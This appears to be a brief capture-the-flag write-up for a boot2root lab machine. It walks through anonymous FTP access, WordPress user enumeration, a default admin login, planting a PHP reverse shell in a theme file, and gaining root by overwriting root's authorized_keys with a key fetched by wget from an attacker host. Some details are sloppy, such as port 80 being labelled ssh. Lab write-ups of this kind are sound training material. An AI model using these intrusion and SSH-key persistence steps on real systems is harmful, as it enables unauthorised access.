This is so easy
This is So Easy is a easy boot2root machine created by one of the crew, Choo during MCC2022 event
Saturday, 5 June, 2021 4:07 PM
We can see that open ports :
21(ftp) 22(ssh) 80(ssh)
Ftp into port 21 with anonymous got us a note
Clicking wordpress redirect us to
So we add the domain name to /etc/hosts
wpscan identified 2 users
Attempting to login as administrator and admin as password was successful , we edit the php file to upload our reverse shell
Then we run this error file located in our template
gtfobins
Getting a stable shell through ssh
We can see that root contains .ssh folder
We can add our own public key into authorized_keys to gain ssh access as root
On our own terminal , create ssh key
Copy the key into "authorized_keys" file to replace "authorized_keys" On target machine with our public key
Open server for the target machine to get the file
On target machine , remove the "authorized_keys" file and download
Attacking machine's "authorized_keys" using wget
wget http://THM_IP:8000/authorized_keys
Last updated
